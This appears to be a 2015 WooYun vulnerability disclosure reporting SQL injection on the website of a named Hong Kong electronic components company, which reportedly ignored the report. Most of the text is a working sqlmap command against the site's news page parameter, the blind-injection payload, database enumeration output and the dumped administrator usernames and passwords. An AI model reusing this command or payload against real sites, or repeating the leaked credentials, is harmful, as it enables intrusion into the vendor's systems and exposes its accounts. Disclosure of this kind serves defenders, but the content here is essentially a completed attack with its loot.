Vulnerability summary

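Bug ID: wooyun-2015-0157306

Title: SQL injection vulnerability on the main site of 鴻星國際電子(香港)有限公司 (admin password) (Hong Kong region)

Affected vendor: 鴻星國際電子(香港)有限公司

Reported by: 路人甲

Submitted: 2015-12-03 11:24

Fix time: 2015-12-08 11:26

Public disclosure: 2015-12-08 11:26

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (hkcert, the Hong Kong Internet Emergency Response Coordination Centre) for handling

Source: http://www.wooyun.org. For questions or assistance, contact [email protected]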


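Vulnerability details

Disclosure status:

2015-12-03: Details reported to the vendor; awaiting vendor action
2015-12-08: The vendor actively ignored the vulnerability; details disclosed to the public

Brief description:

The company was founded in 1997 and is currently one of the larger suppliers of electronic components. Its products are widely used in digital products (MP3 and MP4 players, digital cameras, etc.), Bluetooth headsets, mobile phones, telephones, walkie-talkies, PDAs, LCDs, notebook computers, DVB-T, automotive electronics, televisions, communication equipment and terminals. Its main products are: HC-49S, HC-49SMD, HC-49U, OSC, VCXO, TCXO SMD, watch crystals, cylindrical crystals, UM-1, UM-5, and through-hole resistor networks, resistors and capacitors.
Guided by "quality service", "reliable quality" and "continuous innovation", the company aims for 100% customer satisfaction.

Detailed description:

URL: http://**.**.**.**/gb/news_view.php?nid=86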

$ python sqlmap.py -u "http://**.**.**.**/gb/news_view.php?nid=86" -p nid --technique=B --random-agent --batch  --no-cast -D hosonic -T hosonic_manage -C user_name,pass --dump


Database: hosonic
Table: hosonic_manage
[2 entries]
+-----------+---------+
| user_name | pass |
+-----------+---------+
| admin | admin |
| admin | hosonic |
+-----------+---------+

Proof of vulnerability:

---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=86 AND 5331=5331
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL >= 5.0.0
current user: 'hosonic@localhost'
current user is DBA: False
database management system users [1]:
[*] 'hosonic'@'localhost'
Database: hosonic
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| hosonic_news | 59 |
| hosonic_products | 49 |
| hosonic_type | 9 |
| hosonic_message | 6 |
| hosonic_n_type | 5 |
| hosonic_manage | 2 |
+---------------------------------------+---------+
Database: information_schema
+---------------------------------------+---------+
| Table | Entries |
+---------------------------------------+---------+
| COLUMNS | 253 |
| COLLATION_CHARACTER_SET_APPLICABILITY | 126 |
| COLLATIONS | 126 |
| CHARACTER_SETS | 36 |
| TABLES | 23 |
| SCHEMA_PRIVILEGES | 16 |
| KEY_COLUMN_USAGE | 6 |
| STATISTICS | 6 |
| TABLE_CONSTRAINTS | 6 |
| SCHEMATA | 2 |
| USER_PRIVILEGES | 1 |
+---------------------------------------+---------+
columns LIKE 'pass' were found in the following databases:
Database: hosonic
Table: hosonic_manage
[1 column]
+--------+
| Column |
+--------+
| pass |
+--------+
Database: hosonic
Table: hosonic_manage
[2 entries]
+---------+
| pass |
+---------+
| admin |
| hosonic |
+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: nid (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: nid=86 AND 5331=5331
---
web application technology: Apache, PHP 5.2.17
back-end DBMS: MySQL 5
Database: hosonic
Table: hosonic_manage
[2 entries]
+-----------+---------+
| user_name | pass |
+-----------+---------+
| admin | admin |
| admin | hosonic |
+-----------+---------+

Remediation:

Deploy a WAF.

Copyright notice: when reposting, please credit the source 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: No impact (ignored by vendor)

Ignored at: 2015-12-08 11:26

Vendor reply:

Latest status:

None yet